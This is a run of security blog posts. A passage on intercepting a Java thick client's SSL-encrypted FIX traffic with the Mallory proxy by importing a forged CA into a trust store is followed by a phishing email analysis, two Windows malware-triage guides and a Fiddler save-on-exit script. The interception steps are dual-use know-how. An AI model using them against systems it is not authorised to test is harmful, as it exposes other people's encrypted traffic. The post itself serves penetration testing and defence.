Once everything is configured, switch back to the testing VM and browse to an SSL site (such as https://www.google.com). The browser will report an SSL certificate error-Mallory is generating a fake SSL certificate and then re-encrypting the communications to the target server. Confirm the security exception, and the target page should load. Switch back to the Mallory VM, and we can see the request in the intercepting tab.


Figure 16: Mallory has captured an HTTP request sent via SSL to 74.125.224.82 – google.com – on port 443.


FIX over SSL

So Mallory can successfully intercept SSL traffic (albeit with some more or less unavoidable certificate errors), but our thick client is sending SSL-encrypted-FIX, not HTTP. First, we need to identify which port (or ports) the thick client is using to send data. I was given this information (port 32001, in my case), but if you don’t know which port you need to intercept, use Wireshark to monitor outgoing traffic and isolate your target traffic. Add a line to the Protocols tab for the identified port:

fixssl:sslproto.SSLProtocol:32001


Click Apply to save changes. For testing purposes, keep the “DebugAll” rule enabled, and make sure Intercept and Auto Send are both enabled.

We’re not quite done yet. If you fire up your client immediately, we’ll end up with errors like this one:


Figure 17: Client refusing the SSL handshake.


The client refused to handshake to Mallory, since Java was (correctly!) flagging Mallory’s generated SSL certificate as unknown. In a nutshell, we need to import Mallory’s CA certificate into the Java trust store for our application. In this case, there are two options:

  • The thick client had a configuration file with an application-specific trust store called “client_truststore”:
    <ssl dir="config"
    trustStoreFile="client_truststore">
    However, this trust store is password-protected, so adding a certificate is non-trivial.
  • The Java Runtime Engine installed on most systems has a system-wide trust store file. On my system, this file lived in:
    C:\Program Files\Java\jre6\lib\security\cacerts
    This trust store is also password protected, but the password is ‘changeit’. Obviously, nobody changed it.


Once we know where our trust store is, adding a certificate is pretty straightforward. We need three things:
  1. Mallory’s CA certificate, named “ca.cer”(from /home/mallory/mallory/current/src/ca/ca.cer)
  2. The system trust store file, named “cacerts” (from C:\Program Files\Java\jre6\lib\security\cacerts)
  3. The Java ‘Keytool’ application (from C:\Program Files\Java\jre6\bin)


Copy ca.cer and cacerts to the thick client’s working directory. We don’t want to import this certificate into our system-wide trust store, because that could put traffic other than our thick client traffic at risk. Putting these together is a snap. Just run the following command, which will import the Mallory CA certificate into the cacerts trust store:

“C:\Program Files\Java\jre6\bin\keytool.exe” –import –alias malloryca –file ca.cer –keystore cacerts –storepass changeit



Keytool will prompt you to trust the certificate; tell it “yes:”
Trust this certificate? [no]: yes



Figure 18: Adding certificate to keystore


Finally, we need to reconfigure the thick client to use our new vulnerable cacerts trust store instead of the old, secure, vendor-provided trust store. Going back to the application configuration where we originally saw that “client_truststore” change the “<ssl” line to read as follows:

<ssl dir=”config” trustStoreFile=”cacerts”>


Now that the Java thick client is using the trust store file containing the Mallory certificate, let’s see if Mallory can intercept and decrypt the FIX protocol messages:


Figure 19: Mallory performing a MiTM on SSL encrypted FIX traffic.


Awesome!

Recap

What we’ve done:

  • Setup and configured Mallory;
  • Routed traffic through Mallory, both HTTP and HTTPS;
  • Added a custom certificate to a keystore and successfully MiTM’ed a java thick client; and
  • Successfully decoded and intercepted the FIX protocol.

Phishing 101 - Subject: Access Blocked

$
0
0
By Jerry Pierce.

Give a man food, and he’ll eat for one day – teach a man to PHISH and he’ll use your credit card to live a lifetime. Well, at least until you notify your bank…

Earlier this week, Brad Antoniewicz came across a piece of spam in his mailbox that caught his attention - it was strangely professional. He offered up the e-mail to anyone in Foundstone who was curious and I choose to dive in!

Taking a look, the email itself looks fairly solid with the exception of the originating email address of “chase@accounts.com” which should start alarm bells ringing:



If you banked with Chase you would be very alarmed at the seeming legitimacy of this email alert!

If you open the “Restore Access Form” which is attached, you get presented with a very official looking interface to what purports to be chaseonline.chase.com:



The primary reason that everything looks so legit is that the hacker is pulling the graphical images from the legitimate “chaseonline.chase.com” site.

Sharp eyed and paranoid users might notice the connection the form opened isn’t using HTTPS and that everything you enter is traversing the internet in clear text. No banking site would consider prompting you for that sort of critical financial information without safeguarding it via HTTPS.

If you “hover” of the “NEXT” button you see that instead of “http://www.chase.com” being displayed we see the true destination of any information you enter:



Hrmm... http://80.15.197.249/s/w.php looks pretty suspicious!

Following up this trail, we start by using one of the online Registries to determine the country and ownership of the IP address in question. Since we don’t know off-hand where that IP resides, we’ll query the American Registry of Internet Numbers or “ARIN” which identifies the IP address as being managed by “RIPE” for EMEA based resolution.

Once there, a “whois” lookup shows that the IP address which is receiving the credit card data is found to be part of a network block allocated to France Telecom:



So while the email looks legit and has a potentially true “ring” to it, always be suspicious and rather than just supplying this sort of information to a nameless site somewhere on the internet, contact your bank or credit card provider directly for confirmation of any problem.

The site is already down, or at least unresponsive, and a quick search for 80.15.197.249 results in this https://www.phishtank.com/phish_detail.php?phish_id=1438995 which identifies it as a phish!

So remember, don't open that attachment or click that link!

Here are a couple phishing references (courtesy of Chris Silvers):

Am I pwn3d? Windows *Native* Tool Triage

$
0
0
By Tony Lee and Jerry Pierce.

So, you are surfing the web, checking your email, and performing other daily tasks… $#@!, you just realized you clicked a link, opened an attachment, or visited a site that you probably should not have. So what do you do? Cry a little or take action?

Perhaps a friend, family member or neighbor approaches you and asks you to help them “fix their computer” or they say, “I think I have been hacked!”

Whatever the scenario, we have outlined some steps--using native Windows binaries--that you can follow in order to do a little preliminary analysis to detect potential compromise and triage the system.

Indicators of Compromise Covered


  • Processes
  • Network Connections
  • Common File Locations
    • System32
    • Home Directory
  • Persistence Mechanisms
    • Services
    • Registry
    • Tasks
    • Startup Directory


If your relative/friend or family member is remote, you will most likely have to send the output to a file or have them read it to you (good luck with that if they aren’t technical), but it is a start.

Note: If you cannot coach family members to get to the cmd prompt--all hope may already be lost ;)

Examine Processes


The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and other information.

tasklist >> output.txt

Sample Output
C:\>tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 16 K
System 4 Console 0 212 K
smss.exe 604 Console 0 404 K
csrss.exe 652 Console 0 1,996 K
winlogon.exe 676 Console 0 3,468 K
services.exe 720 Console 0 3,368 K
lsass.exe 732 Console 0 5,972 K
svchost.exe 892 Console 0 4,764 K
svchost.exe 960 Console 0 4,164 K
svchost.exe 1072 Console 0 19,276 K
svchost.exe 1132 Console 0 3,484 K
svchost.exe 1272 Console 0 3,064 K
explorer.exe 1408 Console 0 15,252 K
VMwareUser.exe 1648 Console 0 2,888 K
ctfmon.exe 1660 Console 0 3,004 K
wracing.exe 1680 Console 0 1,220 K
sqlmangr.exe 1692 Console 0 4,804 K
svchost.exe 1808 Console 0 3,700 K
inetinfo.exe 1864 Console 0 7,904 K
sqlservr.exe 1880 Console 0 7,768 K
VMwareService.exe 128 Console 0 2,236 K
alg.exe 1168 Console 0 3,536 K
cmd.exe 1928 Console 0 2,836 K
defrag.exe 1396 Console 0 3,304 K
dfrgntfs.exe 1260 Console 0 9,556 K
wmiprvse.exe 1756 Console 0 5,876 K
firefox.exe 380 Console 0 24,852 K
tasklist.exe 1284 Console 0 4,312 K

Once the command has been executed a well trained eye can usually spot an oddly named program that is running, however some malware will try to appear as innocuous as possible and won’t stand out from a process name alone. If something is unfamiliar, there are many sites that can be used to investigate a binary name such as http://www.processlibrary.com/. (No results from processlibrary.com can be as concerning as a positive bad hit).

ProcessLibrary.com Example

Search results for: wracing.exe Your search "wracing.exe" did not match any documents. Make sure the search term was spelled correctly.

Examine Network Connections


The following command has been natively present in Windows for ages, however the -o option has been available since at least Windows XP and 2003. The -o option provides the PID of the process that is holding the port open. This PID can be cross referenced with the process information that you pulled in the previous section to examine the process name that is holding the port open.

netstat -ano >> output.txt

Sample Output

C:\>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1864
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1864
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 960
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 1864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 1864
TCP 127.0.0.1:1030 0.0.0.0:0 LISTENING 1168
TCP 127.0.0.1:1737 127.0.0.1:1738 ESTABLISHED 380
TCP 127.0.0.1:1738 127.0.0.1:1737 ESTABLISHED 380
TCP 127.0.0.1:1741 127.0.0.1:1742 ESTABLISHED 380
TCP 127.0.0.1:1742 127.0.0.1:1741 ESTABLISHED 380
TCP 192.168.200.53:139 0.0.0.0:0 LISTENING 4
TCP 192.168.200.53:1743 74.125.239.18:80 ESTABLISHED 380
TCP 192.168.200.53:1745 74.125.239.18:80 ESTABLISHED 380
TCP 192.168.200.53:1746 72.235.63.10:80 ESTABLISHED 380
TCP 192.168.200.53:1747 72.235.63.19:80 ESTABLISHED 380
TCP 192.168.200.53:1749 74.125.239.6:80 ESTABLISHED 380
TCP 192.168.200.53:1750 63.232.79.43:443 ESTABLISHED 1680
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 732
UDP 0.0.0.0:3456 *:* 1864
UDP 0.0.0.0:4500 *:* 732
UDP 127.0.0.1:123 *:* 1072
UDP 192.168.200.53:123 *:* 1072
UDP 192.168.200.53:137 *:* 4
UDP 192.168.200.53:138 *:*

You are looking for any “odd” port that is listening as this might indicate the malware has placed a backdoor onto your system, or any connections to odd sites/locations around the world which you haven’t initiated.

We realize that netstat -anb can provide even more information to include the libraries that are associated with the PID, however this takes longer to run and may not be allowed to run without elevating the prompt in Windows 7.

Examine Common File Locations


The following command has been natively present in Windows since the dawn of time, however the options may not be well known to you or your family members. Running the “dir” command with the following syntax will produce a listing that is sorted by the file creation time.

System32


Many files are located here and thus this is a common place for malware to hide among the weeds

dir /o:d /t:c c:\windows\system32 >> output.txt

Sample Output

C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010 05:48 PM 689,152 xpsp3res.dll
01/07/2010 06:02 PM <DIR> en
01/07/2010 06:02 PM <DIR> scripting
01/07/2010 06:02 PM <DIR> en-us
01/07/2010 06:19 PM 1,676,288 xpssvcs.dll
01/07/2010 06:19 PM 575,488 xpsshhdr.dll
01/07/2010 06:19 PM 117,760 prntvpt.dll
01/07/2010 06:20 PM <DIR> XPSViewer
01/07/2010 06:34 PM 2,560 xpsp4res.dll
01/07/2010 07:39 PM 25,966,024 MRT.exe
01/07/2010 07:50 PM 3,706 TZLog.log
2009 File(s) 408,261,849 bytes
52 Dir(s) 2,505,060,352 bytes free

User’s home directory


This is a popular spot for malware to hide because the attacker has permission to write to these locations under the context of the user.

dir /a /s /o:d /t:c “%USERPROFILE%” >> output.txt

Sample Output

dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010 07:00 PM 54,272 Set29F.tmp
01/07/2010 07:42 PM <DIR> NDP1.1sp1-KB953297-X86
01/07/2010 07:47 PM 14,010 ASPNETSetup_00002.log
09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll
09/13/2010 09:28 PM <DIR> plugtmp
03/23/2012 01:43 PM <DIR> VMwareDnD
03/23/2012 02:54 PM 104 pdracing.tmp
-SNIP-

The filenames above are from real malware--we did not make those up.

Investigating Persistence


Sometimes the persistence mechanism (the way malware tries to assure its continued existence on a system) can give away the presence of malicious software on a system. The following persistence mechanisms will be examined:

  • Services
  • Registry
  • Scheduled Tasks
  • Startup Directory


Examine Services


The following command has been natively present in Windows since before the dawn of time. This command is commonly used to list the started services.

net start >> output.txt

Sample Output
C:\>net start
These Windows services are started:

Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
FTP Publishing
Help and Support
IIS Admin
IPSEC Services
Logical Disk Manager
MSSQLSERVER
Network Connections
Network Location Awareness (NLA)
Plug and Play
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
VMware Tools Service
WebClient
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Workstation
World Wide Web Publishing

The command completed successfully.

The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and the keyname for the service.

tasklist /svc >> output.txt

Sample Output
C:\>tasklist /svc

Image Name PID Services
========================= ====== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 604 N/A
csrss.exe 652 N/A
winlogon.exe 676 N/A
services.exe 720 Eventlog, PlugPlay
lsass.exe 732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe 892 DcomLaunch, TermService
svchost.exe 960 RpcSs
svchost.exe 1072 Browser, CryptSvc, Dhcp, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, seclogon, SENS, SharedAccess,
ShellHWDetection, TapiSrv, TrkWks, W32Time,
winmgmt, wscsvc, wuauserv
svchost.exe 1132 Dnscache
svchost.exe 1272 LmHosts, RemoteRegistry
explorer.exe 1408 N/A
VMwareUser.exe 1648 N/A
ctfmon.exe 1660 N/A
wracing.exe 1680 N/A
sqlmangr.exe 1692 N/A
svchost.exe 1808 WebClient
inetinfo.exe 1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe 1880 MSSQLSERVER
VMwareService.exe 128 VMTools
alg.exe 1168 ALG
cmd.exe 1928 N/A
firefox.exe 380 N/A
notepad.exe 1344 N/A
tasklist.exe 1820 N/A
wmiprvse.exe 1892 N/A

Additional analysis could include digging further into a particular service shown above. A great native tool for this is sc (service control):

sc qc  >> output.txt

Sample Output
C:\>sc qc webclient
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: webclient
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP : NetworkProvider
TAG : 0
DISPLAY_NAME : WebClient
DEPENDENCIES : MRxDAV
SERVICE_START_NAME : NT AUTHORITY\LocalService

Examine Registry Entries


The following command has been natively present in Windows for quite some time--however, the keys are the ones examined by Sysinternal’s autoruns:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

Sample Output
C:\>reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

! REG.EXE VERSION 3.0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ctfmon.exe REG_SZ C:\WINDOWS\system32\ctfmon.exe
wracing REG_SZ C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys

With this sample output, we see that “wracing.exe” is in the “C:\Documents and Settings\Administrator\Local Settings\Temp” directory. We suggest you review the file listing of this directory, sorted by file creation time as well to see what other artifacts may be present from the same timeframe.

Examine Scheduled Tasks


The following command has been natively present in Windows for quite a while, however it is falling out of favor in Windows 7 and 2008:

at >> output.txt

Sample Output
C:\>at
There are no entries in the list.

Windows 7 and 2008 prefers the following newer command:

schtasks >> output.txt

Sample Output

C:\Documents and Settings\Administrator>schtasks

TaskName Next Run Time Status
=================================== ====================== ===============
Ezyme 16:33:00, 3/23/2012

Examine Startup Directory


We will use the ‘dir’ command again in order to inspect the startup directory specifically:

dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
dir “C:\Documents and Settings\\Start Menu\Programs\Startup”
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Sample Output
C:\>dir "c:\documents and settings\Administrator\start menu\programs\startup"
Volume in drive C has no label.
Volume Serial Number is 442E-ACB9

Directory of c:\documents and settings\Administrator\start menu\programs\startup

11/15/2006 01:37 PM <DIR> .
11/15/2006 01:37 PM <DIR> ..
11/15/2006 01:37 PM 607 putbginfo.bat.lnk
1 File(s) 607 bytes
2 Dir(s) 2,503,716,864 bytes free

Initial Analysis of the Results


Analysis often takes far longer than the time required to run the commands. However, according to the sample information above, it appears that we have at least two infections on this host. The data below ties everything together.

Malicious software is present in the process list here:

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
wracing.exe 1680 Console 0 1,220 K

It also has a connection out to a known bad site:

  TCP    192.168.200.53:1750    63.232.79.43:443       ESTABLISHED     1680

Malicious files are present in the following directory:


C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll

The persistence mechanism is via the registry:

"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
wracing REG_SZ C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys

There is also a second (most likely unrelated) suspicious task that runs via the scheduler:

C:\Documents and Settings\Administrator>schtasks
TaskName Next Run Time Status
=================================== ====================== ===============
Ezyme 16:33:00, 3/23/2012

Food for Thought


If the infection is using rootkit technology, there is a good chance that the native Windows tools will not show you anything. If nothing shows up as indicators of compromise, but they are still convinced they are owned--look for our next post (Am I P0wn3d? Lesson 102 - Windows *Non-Native* Tool Triage) which leverages non-native tools which may provide more insight into the potential breach. Non-native tools may also pull the same information, without using the traditional Windows APIs which can help discover the present of rootkit technology. Happy hunting!

What Native Tips Do You Have?


Do you have any tips or tricks using Native Windows tools? Share them in the comments below!!!

Saving Fiddler Sessions on Exit

$
0
0
By Neelay Shah.

If you are like me and love to use Fiddler frequently, it can be incredibly frustrating at times when you close Fiddler by mistake or in a hurry and all your work is lost since Fiddler does not prompt (or autosave) you to save the sessions before closing. Now the great thing about Fiddler is that it is extremely extensible and so I customized the existing Fiddler rules so that the user is prompted to save the session when Fiddler is closed.

Before we get into the details of the customized rule let’s spend a few minutes understanding how Fiddler’s “Load Archive” and “Save” features work –

  1. Fiddler does not have an “auto save” feature and as such if you do not explicitly save the session(s) then your session(s) are lost as soon as Fiddler is closed.
  2. The “Save” functionality saves the captured sessions as a snapshot in time. So, if you explicitly save a Fiddler session, continue browsing the web application (being proxy'ed through Fiddler) and then exit Fiddler (without saving) all the new sessions that were captured after the previous “Save” operation are lost.
  3. The “Load Archive” functionality loads and appends the user selected session archive to the already open and existing capture. Now if the “Save” operation is invoked then the current capture plus the existing session archive (that was loaded) is saved as a new session archive.


Now let’s look at the rule modifications that will cause Fiddler to allow the user to save sessions when Fiddler is closed. I have tested this with Fiddler v2.3.9.3. I recommend installing the Syntax Highlighting extension - http://fiddler2.com/redir/?id=SYNTAXVIEWINSTALL before attempting to modify the FiddlerScript Rules. Once you install the Syntax Highlighting extension, launch Fiddler and you should see a new tab “FiddlerScript” (between the Composer and the Filters tab). Click the “FiddlerScript” tab and that should open the Rules file. Then you can add the following code appropriately and click “Save Script”.

You will most likely already have an OnShutdown() function in which case simply add the following code to the beginning of the OnShutdown() function

   
static function OnShutdown() {
// MessageBox.Show("Fiddler has shutdown");
var exitPromptResult: DialogResult;

exitPromptResult = MessageBox.Show("Do you want to save this session before Fiddler exits?", "Save on Exit", MessageBoxButtons.YesNo, MessageBoxIcon.Warning, MessageBoxDefaultButton.Button1);

if (DialogResult.Yes != exitPromptResult)
{
//The user does not want to save the capture so proceed to exit
return;
}

//The user selected Yes - Allow the user to save the capture
FiddlerApplication.UI.actSelectAll();
FiddlerApplication.UI.actSaveSessionsToZip();
}



Once you add this code and save the Script Rules, the rule will be in effect and Fiddler will start using the same. Now when you close Fiddler, it should prompt you to save the capture. The behavior of this “Save on Exit” prompt is as follows -

  • If you select “No” then the capture will not be saved and Fiddler will exit
  • If you select “Yes” however select “Cancel” on the ensuing “Save Session Archive to…” dialog then the capture will not be saved and Fiddler will exit
  • If you select “Yes” and enter an appropriate archive name and select “Save” on the ensuing “Save Session Archive to…” dialog then the capture will be saved to the appropriate archive.



Am I pwn3d? Windows *Non-Native* Tool Triage

$
0
0
By Tony Lee, Jerry Pierce, and Vijay Agarwal.

This is a continuation of our previous article on performing a Windows triage--however this time we will try to avoid using native Windows tools. Note that there are lots of GUI tools that can help perform basic forensics, however we use mostly command line tools or options as it does not trample on evidence as much as the GUI tools and it makes writing the data to a file easier for offline analysis. We will continue with the same premise as before:

So, you are surfing the web, checking your email, and performing other daily tasks… $#@!, you just realized you clicked a link, opened an attachment, or visited a site that you probably should not have. So what do you do? Cry a little or take action?

Perhaps a friend, family member or neighbor approaches you and asks you to help them “fix their computer” or they say, “I think I have been hacked!”

Whatever the scenario, we have outlined some steps--using mostly Non-native Windows binaries--that you can follow in order to do a little preliminary analysis to detect potential compromise and triage the system

Indicators of Compromise Covered


  • Processes
  • Network Connections
  • Common File Locations
    • System32
    • Home Directory
  • Persistence Mechanisms
    • Services
    • Registry
    • Tasks
    • Startup Directory

If your relative/friend or family member is remote, you will most likely have to send the output to a file or have them read it to you (good luck with that if they aren’t technical), but it is a start.

Note: If you cannot coach family members to get to the cmd prompt--all hope may already be lost ;)

Examine Processes


The following tool, pslist, is from Mark Russinovich (of sysinternals--now Microsoft). Pslist can be downloaded from http://technet.microsoft.com/en-us/sysinternals/bb896682. It will list the process name, process ID (PID), CPU Time and other information.

pslist >> output.txt

Sample Output
C:\>pslist

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name Pid Pri Thd Hnd Priv CPU Time Elapsed Time
Idle 0 0 1 0 0 3:57:34.937 0:00:00.000
System 4 8 48 340 0 0:01:01.421 0:00:00.000
smss 604 11 3 19 168 0:00:00.031 4:05:30.375
csrss 652 13 12 375 1772 0:00:15.000 4:05:29.265
winlogon 676 13 17 547 7400 0:00:01.171 4:05:29.109
services 720 9 15 261 1664 0:00:03.859 4:05:28.609
lsass 732 9 22 357 3764 0:00:03.968 4:05:28.562
svchost 892 8 14 190 2888 0:00:01.156 4:05:27.890
svchost 960 8 7 235 1640 0:00:02.656 4:05:27.609
svchost 1072 8 67 1251 14668 0:00:20.593 4:05:27.406
svchost 1132 8 6 80 1272 0:00:02.156 4:05:26.875
svchost 1272 8 5 90 1196 0:00:02.781 4:05:26.625
explorer 1408 8 9 330 10304 0:00:15.421 4:05:25.578
VMwareUser 1648 8 1 26 888 0:00:01.000 4:05:23.937
ctfmon 1660 8 1 69 840 0:00:01.546 4:05:23.843
wracing 1680 8 1 19 324 0:00:41.609 4:05:23.687
sqlmangr 1692 8 2 76 1252 0:01:35.203 4:05:23.609
svchost 1808 8 5 107 1272 0:00:03.968 4:05:18.156
inetinfo 1864 8 18 269 3992 0:00:14.140 4:05:17.953
sqlservr 1880 8 21 214 13068 0:00:01.640 4:05:17.859
VMwareService 128 13 3 47 696 0:01:25.015 4:05:14.359
alg 1168 8 6 105 1132 0:00:01.656 4:05:11.046
cmd 1928 8 1 31 2264 0:00:07.937 3:58:41.046
firefox 380 8 12 343 19320 0:00:04.187 2:55:04.140
notepad 1344 8 1 45 1268 0:00:01.531 2:51:28.015
autoruns 1564 8 5 287 12564 0:00:41.437 2:34:45.015
pslist 696 13 2 115 1040 0:00:00.156 0:00:00.250

Pay attention for oddly named processes, and also look at the “Elapsed Time” column – if the oddly named process appears to have the same elapsed time as the bulk of your Windows processes, it’s a clue that it may be starting either at system boot or when you log into the system.

Another option to “pslist” will display the output in a tree format to easily show the parent process and the rest of the process chain.

pslist -t >> output.txt

Sample Output
C:\>pslist -t

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name Pid Pri Thd Hnd VM WS Priv
Idle 0 0 1 0 0 16 0
System 4 8 48 340 1884 212 0
smss 604 11 3 19 3808 404 168
csrss 652 13 12 375 25740 2144 1772
winlogon 676 13 17 547 51648 4188 7400
services 720 9 15 261 20220 3400 1664
VMwareService 128 13 3 47 17764 2256 696
svchost 892 8 14 190 59652 4728 2888
svchost 960 8 7 235 33644 4148 1640
svchost 1072 8 67 1251 138856 24388 14668
svchost 1132 8 6 80 29572 3496 1272
alg 1168 8 6 105 32288 3536 1132
svchost 1272 8 5 90 30980 3248 1196
svchost 1808 8 5 107 35608 3700 1272
inetinfo 1864 8 18 269 43944 7904 3992
sqlservr 1880 8 21 214 559284 7768 13068
lsass 732 9 22 357 41392 6004 3764
explorer 1408 8 9 330 81936 15356 10304
firefox 380 8 12 343 85196 29884 19320
VMwareUser 1648 8 1 26 27996 2888 888
ctfmon 1660 8 1 69 29208 3008 840
sqlmangr 1692 8 2 76 35200 4804 1252
cmd 1928 8 1 31 30848 980 2264
pslist 152 13 2 115 29292 2628 1040
notepad 1344 8 1 45 30304 3768 1268
autoruns 1564 8 5 287 96192 16500 12564
wracing 1680 8 1 19 7480 1220 324

The next tool--cmdline--will list the PID, processes, command line arguments, and show the full path to the binary (how helpful!). The tool used to be available from www.diamondcs.com.au, however the site seems to be a squatted site that no longer hosts the tool. You may be able to find this from a reputable friend in the business (feel free to look us up at Foundstone and we can send you a copy--malware free!).

cmdline >> output.txt

Sample Output
C:\>cmdline
CmdLine - DiamondCS Freeware Console Tools (www.diamondcs.com.au)
---
Found 30 processes.

-snip-

C:\WINDOWS\system32\services.exe [720]
C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\ctfmon.exe [1660]
"C:\WINDOWS\system32\ctfmon.exe"

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
"C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

C:\WINDOWS\system32\notepad.exe [1908]
notepad test.txt

Once the command has been executed a well trained eye can usually spot something that is odd. If something is unfamiliar, there are many sites that can be used to investigate a binary name such as http://www.processlibrary.com/.

No results from processlibrary.com can be as concerning as a positive bad hit:

Example:
Search results for: wracing.exe
Your search "wracing.exe" did not match any documents.
Make sure the search term was spelled correctly.

Examine Network Connections


The following tool, CurrPorts, is from Nirsoft and is available from http://www.nirsoft.net/utils/cports.html. Please see the full manual at the download site for the many options available. We are just listing our favorite options below:

cports /stext cportsoutput.txt

Sample Output
C:\>cports /stext cportsoutput.txt

-snip-
==================================================
Process Name : wracing.exe
Process ID : 1680
Protocol : TCP
Local Port : 1750
Local Port Name :
Local Address : 192.168.200.53
Remote Port : 443
Remote Port Name : https
Remote Address : 63.232.79.43
Remote Host Name :
State : Established
Process Path : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe
Product Name :
-snip-

Examine Common File Locations


In terms of examining file locations, there may not be very many tools better than good old native “dir” command. The following command has been natively present in Windows since before the dawn of time, however the options may not be well known to you or your family members. Running the “dir” command with the following syntax will produce a listing that is sorted by the file creation time.

System32


Many files are located here and thus this is a common place for malware to hide among the weeds
dir /o:d /t:c c:\windows\system32 >> output.txt

Sample Output
C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010 05:48 PM 689,152 xpsp3res.dll
01/07/2010 06:02 PM <dir> en
01/07/2010 06:02 PM <dir> scripting
01/07/2010 06:02 PM <dir> en-us
01/07/2010 06:19 PM 1,676,288 xpssvcs.dll
01/07/2010 06:19 PM 575,488 xpsshhdr.dll
01/07/2010 06:19 PM 117,760 prntvpt.dll
01/07/2010 06:20 PM <dir> XPSViewer
01/07/2010 06:34 PM 2,560 xpsp4res.dll
01/07/2010 07:39 PM 25,966,024 MRT.exe
01/07/2010 07:50 PM 3,706 TZLog.log
2009 File(s) 408,261,849 bytes
52 Dir(s) 2,505,060,352 bytes free

User’s home directory


This is a popular spot for malware to hide because the attacker has permission to write to these locations under the context of the user
dir /a /s /o:d /t:c “%USERPROFILE%” >> output.txt

Sample Output
dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010 07:00 PM 54,272 Set29F.tmp
01/07/2010 07:42 PM <dir> NDP1.1sp1-KB953297-X86
01/07/2010 07:47 PM 14,010 ASPNETSetup_00002.log
09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll
09/13/2010 09:28 PM <dir> plugtmp
03/23/2012 01:43 PM <dir> VMwareDnD
03/23/2012 02:54 PM 104 pdracing.tmp
-SNIP-

Note: The filenames above are from real malware--we did not make those up.

Investigating Persistence


Malware wants to survive a reboot, and the way this is accomplished is called a “Persistence Mechanism”. Sometimes the persistence mechanism can give away the presence of malicious software on a system. The following persistence mechanisms will be examined:
  • Services
  • Registry
  • Scheduled Tasks
  • Startup Directory

Examine Services


Examining services will leverage both native and non-native tools for analysis. The following command has been natively present in Windows for ages. This command is popular to list the started services.

net start >> output.txt

Sample Output
C:\>net start
These Windows services are started:

Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
FTP Publishing
Help and Support
IIS Admin
IPSEC Services
Logical Disk Manager
MSSQLSERVER
Network Connections
Network Location Awareness (NLA)
Plug and Play
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
VMware Tools Service
WebClient
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Workstation
World Wide Web Publishing

The command completed successfully.


The command below using psservice (will discuss soon) could also be used, however it is not as concise as “net start”:
psservice query -s start


You will see sample output from this very useful tool in a bit.
